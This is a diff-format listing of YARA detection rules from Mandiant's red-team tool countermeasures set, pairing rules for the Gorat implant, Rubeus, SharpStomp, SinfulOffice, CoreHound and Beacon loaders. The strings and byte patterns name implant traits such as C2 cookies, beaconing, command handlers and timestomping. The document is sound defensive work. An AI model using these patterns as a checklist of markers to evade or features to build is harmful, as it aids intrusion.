"97b9d057-30d3-5af7-bac6-4dd53f47650f" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_MacOS_GORAT_1.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMISHARP/production/yara/HackTool_MSIL_WMISharp_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "68acf11f5e456744262ff31beae58526" - logic_hash = "2df5f87d44968670511880d21ad184779d0561c7c426a5d6426bcefd0904a9b7" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "d119d52c1410291d582696d5c4c1de3db9008db963c76a9e344959d869c3acc0" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 3 + rev = 1 strings: - $s1 = "SID1=%s" ascii wide - $s2 = "http/http.dylib" ascii wide - $s3 = "Mozilla/" ascii wide - $s4 = "User-Agent" ascii wide - $s5 = "Cookie" ascii wide + $typelibguid0 = "3a2421d9-c1aa-4fff-ad76-7fcb48ed4bff" ascii nocase wide condition: - (( uint32(0)==0xBEBAFECA) or ( uint32(0)==0xFEEDFACE) or ( uint32(0)==0xFEEDFACF) or ( uint32(0)==0xCEFAEDFE)) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Backdoor_Win_GORAT_3 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Corehound_1 : FILE { meta: - description = "This rule uses the same logic as FE_APT_Trojan_Win_GORAT_1_FEBeta with the addition of one check, to look for strings that are known to be in the Gorat implant when a certain cleaning script is not run against it." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CoreHound' project." author = "FireEye" - id = "94c195b5-b8e8-56a7-bc11-dbbe2f969b06" + id = "8c914b34-3e3d-53ae-a5e4-9dbfdff45a24" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_3.yar#L4-L39" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/COREHOUND/production/yara/HackTool_MSIL_CoreHound_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "995120b35db9d2f36d7d0ae0bfc9c10d" - logic_hash = "592745e9c67f7adf0cd48975ed1497211d8efeff29b52be1e2d082b9a648bb57" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "b0f759709428d5c9404507a13259bf85cb8c405d38b807539098f7cc871023d8" score = 75 - quality = 28 + quality = 73 tags = "FILE" - rev = 5 + rev = 1 strings: - $dirty1 = "fireeye" ascii nocase wide - $dirty2 = "kulinacs" ascii nocase wide - $dirty3 = "RedFlare" ascii nocase wide - $dirty4 = "gorat" ascii nocase wide - $dirty5 = "flare" ascii nocase wide - $go1 = "go.buildid" ascii wide - $go2 = "Go build ID:" ascii wide - $json1 = "json:\"pid\"" ascii wide - $json2 = "json:\"key\"" ascii wide - $json3 = "json:\"agent_time\"" ascii wide - $json4 = "json:\"rid\"" ascii wide - $json5 = "json:\"ports\"" ascii wide - $json6 = "json:\"agent_platform\"" ascii wide - $rat = "rat" ascii wide - $str1 = "handleCommand" ascii wide - $str2 = "sendBeacon" ascii wide - $str3 = "rat.AgentVersion" ascii wide - $str4 = "rat.Core" ascii wide - $str5 = "rat/log" ascii wide - $str6 = "rat/comms" ascii wide - $str7 = "rat/modules" ascii wide - $str8 = "murica" ascii wide - $str9 = "master secret" ascii wide - $str10 = "TaskID" ascii wide - $str11 = "rat.New" ascii wide + $typelibguid0 = "1fff2aee-a540-4613-94ee-4f208b30c599" ascii nocase wide condition: - uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and filesize <10MB and all of ($go*) and all of ($json*) and all of ($str*) and #rat>1000 and any of ($dirty*) + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Backdoor_Win_GORAT_1 : FILE +rule FIREEYE_RT_Methodology_OLE_CHARENCODING_2 : FILE { meta: - description = "This detects if a sample is less than 50KB and has a number of strings found in the Gorat shellcode (stage0 loader). The loader contains an embedded DLL (stage0.dll) that contains a number of unique strings. The 'Cookie' string found in this loader is important as this cookie is needed by the C2 server to download the Gorat implant (stage1 payload)." + description = "Looking for suspicious char encoding" author = "FireEye" - id = "5ac84cf1-49fb-533d-b211-b1a92239063b" + id = "7abd1a11-7a55-50ac-aa6b-537e7c59a5ab" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_1.yar#L4-L23" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/supplemental/yara/Methodology_OLE_CHARENCODING_2.yar#L4-L23" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "66cdaa156e4d372cfa3dea0137850d20" - logic_hash = "f6a0a923f64375e7ffdc080aec41db19a9e162405f1290ed0bbcce5a342bdadb" - score = 75 + hash = "41b70737fa8dda75d5e95c82699c2e9b" + logic_hash = "20843295531dfd88934fe0902a5101c5c0828e82df3289d7f263f16df9c92324" + score = 65 quality = 75 tags = "FILE" rev = 4 strings: - $s1 = "httpComms.dll" ascii wide - $s2 = "Cookie: SID1=%s" ascii wide - $s3 = "Global\\" ascii wide - $s4 = "stage0.dll" ascii wide - $s5 = "runCommand" ascii wide - $s6 = "getData" ascii wide - $s7 = "initialize" ascii wide - $s8 = "Windows NT %d.%d;" ascii wide - $s9 = "!This program cannot be run in DOS mode." ascii wide + $echo1 = "101;99;104;111;32;111;102;102;" ascii wide + $echo2 = "101:99:104:111:32:111:102:102:" ascii wide + $echo3 = "101x99x104x111x32x111x102x102x" ascii wide + $pe1 = "77;90;144;" ascii wide + $pe2 = "77:90:144:" ascii wide + $pe3 = "77x90x144x" ascii wide + $pk1 = "80;75;3;4;" ascii wide + $pk2 = "80:75:3:4:" ascii wide + $pk3 = "80x75x3x4x" ascii wide condition: - filesize <50KB and all of them + ( uint32(0)==0xe011cfd0) and filesize <10MB and any of them } -rule FIREEYE_RT_Trojan_MSIL_GORAT_Plugin_DOTNET_1 : FILE +rule FIREEYE_RT_Builder_MSIL_Sinfuloffice_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'RedFlare - Plugin - .NET' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SinfulOffice' project." author = "FireEye" - id = "faa73d64-4bb1-5c06-a3a5-1f1aa99ea932" + id = "cf020fb3-751b-5346-8c0d-dc0a552599a3" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/Trojan_MSIL_GORAT_Plugin_DOTNET_1.yar#L4-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SINFULOFFICE/production/yara/Builder_MSIL_SinfulOffice_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "e979822273c6d1ccdfebd341c9e2cb1040fe34a04e8b41c024885063fd946ad5" + logic_hash = "b5d49a8720e4daa21e95ec66299daec42e65906017de886ea91f7bb6bfb04c77" score = 75 - quality = 71 + quality = 73 tags = "FILE" rev = 1 strings: - $typelibguid0 = "cd9407d0-fc8d-41ed-832d-da94daa3e064" ascii nocase wide - $typelibguid1 = "fc3daedf-1d01-4490-8032-b978079d8c2d" ascii nocase wide + $typelibguid0 = "9940e18f-e3c7-450f-801a-07dd534ccb9a" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -import "pe" - -rule FIREEYE_RT_APT_Backdoor_Win_GORAT_4 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_2 : FILE { meta: - description = "Verifies that the sample is a Windows PE that is less than 10MB in size and exports numerous functions that are known to be exported by the Gorat implant. This is done in an effort to provide detection for packed samples that may not have other strings but will need to replicate exports to maintain functionality." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "fa3bcaad-c210-5b9c-8567-fe85b8e78055" - date = "2021-03-03" - modified = "2021-03-03" + id = "d1a3477d-55c6-5c33-bd65-5b1e0d65f24b" + date = "2020-12-02" + date = "2020-12-02" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE (Gorat)/production/yara/APT_Backdoor_Win_GORAT_4.yar#L5-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_2.yar#L4-L22" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f59095f0ab15f26a1ead7eed8cdb4902" - logic_hash = "ec201614cb91fae9d7c89febfa22dfd6ba7f353e0eeb0b2fec6c8d887992e79e" + hash = "83ed748cd94576700268d35666bf3e01" + logic_hash = "4ed1553f12c607792d7d4e7026ecb36231cd417a06eba8b2925c2c643436b5fe" score = 75 - quality = 25 + quality = 75 tags = "FILE" - rev = 8 + rev = 3 strings: - $mz = "MZ" + $f0 = "mscoree.dll" fullword nocase + $s0 = { 06 72 [4] 6F [4] 2C ?? 06 72 [4] 6F [4] 2D ?? 72 [4] 28 [4] 28 [4] 2A } + $s1 = { 02 28 [4] 0A 02 28 [4] 0B 02 28 [4] 0C 72 [4] 28 [4] 72 } + $s2 = { 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 72 } + $s3 = "SetCreationTime" fullword + $s4 = "GetLastAccessTime" fullword + $s5 = "SetLastAccessTime" fullword condition: - $mz at 0 and uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and filesize <10MB and pe.exports("MemoryCallEntryPoint") and pe.exports("MemoryDefaultAlloc") and pe.exports("MemoryDefaultFree") and pe.exports("MemoryDefaultFreeLibrary") and pe.exports("MemoryDefaultGetProcAddress") and pe.exports("MemoryDefaultLoadLibrary") and pe.exports("MemoryFindResource") and pe.exports("MemoryFindResourceEx") and pe.exports("MemoryFreeLibrary") and pe.exports("MemoryGetProcAddress") and pe.exports("MemoryLoadLibrary") and pe.exports("MemoryLoadLibraryEx") and pe.exports("MemoryLoadResource") and pe.exports("MemoryLoadString") and pe.exports("MemoryLoadStringEx") and pe.exports("MemorySizeofResource") and pe.exports("callback") and pe.exports("crosscall2") and pe.exports("crosscall_386") + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Hacktool_MSIL_PXELOOT_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Sharpstomp_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the PXE And Loot project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharpStomp project." author = "FireEye" - id = "5a72a6ff-bae4-57f5-a19b-a4595ac57293" + id = "e113c221-fabe-5af4-b763-463c4f86288d" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PXELOOT/production/yara/HackTool_MSIL_PXELOOT_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/HackTool_MSIL_SharpStomp_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "82e33011ac34adfcced6cddc8ea56a81" - logic_hash = "c9892adcb9ff5471235e45988f6662d3b8f984fdafca7024a5781eed50f6c0b3" + hash = "83ed748cd94576700268d35666bf3e01" + logic_hash = "fd0a3d046734d48be74d9a74f27570468550d21911c54ca82c81a1d64e9fdd17" score = 75 quality = 73 tags = "FILE" - rev = 7 + rev = 4 strings: - $typelibguid1 = "78B2197B-2E56-425A-9585-56EDC2C797D6" ascii nocase wide + $typelibguid1 = "41f35e79-2034-496a-8c82-86443164ada2" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 } -rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharPersist project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "586e6c91-6970-57d1-8d8c-05ae9eb6117a" - date = "2020-12-09" + id = "4b4a54c8-9717-5fbb-8130-a49162bc6b07" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_1.yar#L4-L24" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "98ecf58d48a3eae43899b45cec0fc6b7" - logic_hash = "cf480026c31b522850e25ba2d7986773d9c664242a2667ecd33151621c98c91e" + hash = "83ed748cd94576700268d35666bf3e01" + logic_hash = "af8aa0e87d8b6623a908fde5014f3849cd0ca20d5926c798be82ce4eab2668bb" score = 75 - quality = 73 + quality = 71 tags = "FILE" - rev = 1 + rev = 3 strings: - $typelibguid1 = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii nocase wide + $s0 = "mscoree.dll" fullword nocase + $s1 = "timestompfile" fullword nocase + $s2 = "sharpstomp" fullword nocase + $s3 = "GetLastWriteTime" fullword + $s4 = "SetLastWriteTime" fullword + $s5 = "GetCreationTime" fullword + $s6 = "SetCreationTime" fullword + $s7 = "GetLastAccessTime" fullword + $s8 = "SetLastAccessTime" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and $typelibguid1 + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Hacktool_MSIL_Sharpersist_2 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Rubeus_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public Rubeus project." author = "FireEye" - id = "49d7891e-b97a-52a8-acfd-bbf986732d6c" + id = "0ca140ea-2b9f-5904-a4c0-8615229626f0" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPERSIST/production/yara/HackTool_MSIL_SharPersist_2.yar#L4-L23" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RUBEUS/production/yara/HackTool_MSIL_Rubeus_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "98ecf58d48a3eae43899b45cec0fc6b7" - logic_hash = "57387352f8fd08e8b859dffc1164d46370f248b337526c265634160010572a00" + hash = "66e0681a500c726ed52e5ea9423d2654" + logic_hash = "ad954f9922ab564d68cb4515b080f6ee69476a8d87f0038e2ae4c222f0e182d7" score = 75 - quality = 75 + quality = 73 tags = "FILE" - rev = 1 + rev = 4 strings: - $a1 = "SharPersist.lib" - $a2 = "SharPersist.exe" - $b1 = "ERROR: Invalid hotkey location option given." ascii wide - $b2 = "ERROR: Invalid hotkey given." ascii wide - $b3 = "ERROR: Keepass configuration file not found." ascii wide - $b4 = "ERROR: Keepass configuration file was not found." ascii wide - $b5 = "ERROR: That value already exists in:" ascii wide - $b6 = "ERROR: Failed to delete hidden registry key." ascii wide - $pdb1 = "\\SharPersist\\" - $pdb2 = "\\SharPersist.pdb" + $typelibguid = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii nocase wide condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and ((@pdb2[1]<@pdb1[1]+50) or (1 of ($a*) and 2 of ($b*))) + uint16(0)==0x5A4D and $typelibguid } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSQLCLIENT_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_NOAMCI_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsqlclient' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'noamci' project." author = "FireEye" - id = "4d526c36-f56f-53cf-9bdf-b7a15619eb41" + id = "48066258-528f-5a70-81e1-15d6dfd9ff4f" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPSQLCLIENT_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NOAMCI/production/yara/APT_HackTool_MSIL_NOAMCI_1.yar#L4-L16" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "bc79f80582f4fadecf54d926abdcf61694224654ba5075203f0d1123cf11afc1" + logic_hash = "6278cfb4e9af20bbe943f4b99227c7fba276315a9f0059575b3ed4ef96a848c4" score = 75 - quality = 73 + quality = 71 tags = "FILE" - rev = 2 + rev = 4 strings: - $typelibguid0 = "13ed03cd-7430-410d-a069-cf377165fbfd" ascii nocase wide + $typelibguid0 = "7bcccf21-7ecd-4fd4-8f77-06d461fd4d51" ascii nocase wide + $typelibguid1 = "ef86214e-54de-41c3-b27f-efc61d0accc3" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNATIVEZIPPER_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Sharpschtask_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnativezipper' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpSchtask' project." author = "FireEye" - id = "c48835a7-06fe-5b30-be4d-086d98dc7a21" + id = "5c7a5dee-3bc2-54b2-a7e2-be05ba74d4a1" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNATIVEZIPPER_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSCHTASK/production/yara/HackTool_MSIL_SharpSchtask_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "fa54375b21abbb613e695f70a15233575fbe6e0536716544bb3b527f5e3ed8c6" + logic_hash = "7437fde82920f4d015a7f149b58924baf6cb220c6f6857d9509e23795ff0811c" score = 75 quality = 73 tags = "FILE" - rev = 3 + rev = 1 strings: - $typelibguid0 = "de5536db-9a35-4e06-bc75-128713ea6d27" ascii nocase wide + $typelibguid0 = "0a64a5f4-bdb6-443c-bdc7-f6f0bf5b5d6c" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPPATCHCHECK_1 : FILE +rule FIREEYE_RT_Loader_Win_Generic_18 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharppatchcheck' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "dedc12b9-b9e7-5c13-ad6d-2e286aba2302" - date = "2020-12-09" + id = "6f44bd64-29bd-50e2-8b61-7ba61bb1f688" + date = "2020-11-25" + date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPPATCHCHECK_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_18.yar#L4-L19" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "dec6231b656eed1526d4f70fe1b9a476bfb06246f0a7c25f2687d8c68886d400" + hash = "c74ebb6c238bbfaefd5b32d2bf7c7fcc" + logic_hash = "28c9497f646fcf3daf7007d7afd37971dd85382062c064173f13049ad419fef1" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 3 strings: - $typelibguid0 = "528b8df5-6e5e-4f3b-b617-ac35ed2f8975" ascii nocase wide + $s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 } + $s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 } + $si1 = "fread" fullword + $si2 = "fwrite" fullword condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPWEBCRAWLER_1 : FILE +rule FIREEYE_RT_Trojan_Raw_Generic_4 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpwebcrawler' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "29b2a410-bcc4-58df-b192-7a413b3db1c0" - date = "2020-12-09" + id = "9092f9bb-cab6-55c0-9452-70a6407db93a" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPWEBCRAWLER_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Raw_Generic_4.yar#L4-L17" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "8df328663a813ca0a6864ae0503cbc1b03cfdf839215b9b4f2bb7962adf09bf8" + hash = "f41074be5b423afb02a74bc74222e35d" + logic_hash = "8ffd23631c1a9d1abe6695858ec34d61261b3b3f097be94372f3f34e46e7211e" score = 75 - quality = 73 + quality = 75 tags = "FILE" - rev = 2 + rev = 1 strings: - $typelibguid0 = "cf27abf4-ef35-46cd-8d0c-756630c686f1" ascii nocase wide + $s0 = { 83 ?? 02 [1-16] 40 [1-16] F3 A4 [1-16] 40 [1-16] E8 [4-32] FF ( D? | 5? | 1? ) } + $s1 = { 0F B? [1-16] 4D 5A [1-32] 3C [16-64] 50 45 [8-32] C3 } condition: - ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them + uint16(0)!=0x5A4D and all of them } -rule FIREEYE_RT_APT_Hacktool_MSIL_MODIFIEDSHARPVIEW_1 : FILE +rule FIREEYE_RT_Trojan_Win_Generic_101 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'modifiedsharpview' project." + description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "e07d3d4b-fba3-5df7-85f4-927bb8cec2d1" - date = "2020-12-09" + id = "0290aaea-d65b-5883-97f9-549d107e3e1f" + date = "2020-11-25" + date = "2020-11-25" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_MODIFIEDSHARPVIEW_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Win_Generic_101.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "db0eaad52465d5a2b86fdd6a6aa869a5" - logic_hash = "a47c48da998243fab92665649fb9d6ecc6ac32e1fd884c2c0d5ccecb05290c10" + hash = "2e67c62bd0307c04af469ee8dcb220f2" + logic_hash = "e530183f3cab01560b1abc91e2111e5d9e5aadc1c8134027ac07d8917f9419a0" score = 75 - quality = 73 + quality = 75 tags = "FILE" rev = 3 strings: - $typelibguid0 = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii nocase wide + $s0 = { 2A [1-16] 17 [1-16] 02 04 00 00 [1-16] FF 15 } + $s1 = { 81 7? [1-3] 02 04 00 00 7? [1-3] 83 7? [1-3] 17 7? [1-3] 83 7? [1-3] 2A 7? } + $s2 = { FF 15 [4-16] FF D? [1-16] 3D [1-24] 89 [1-8] E8 [4-16] 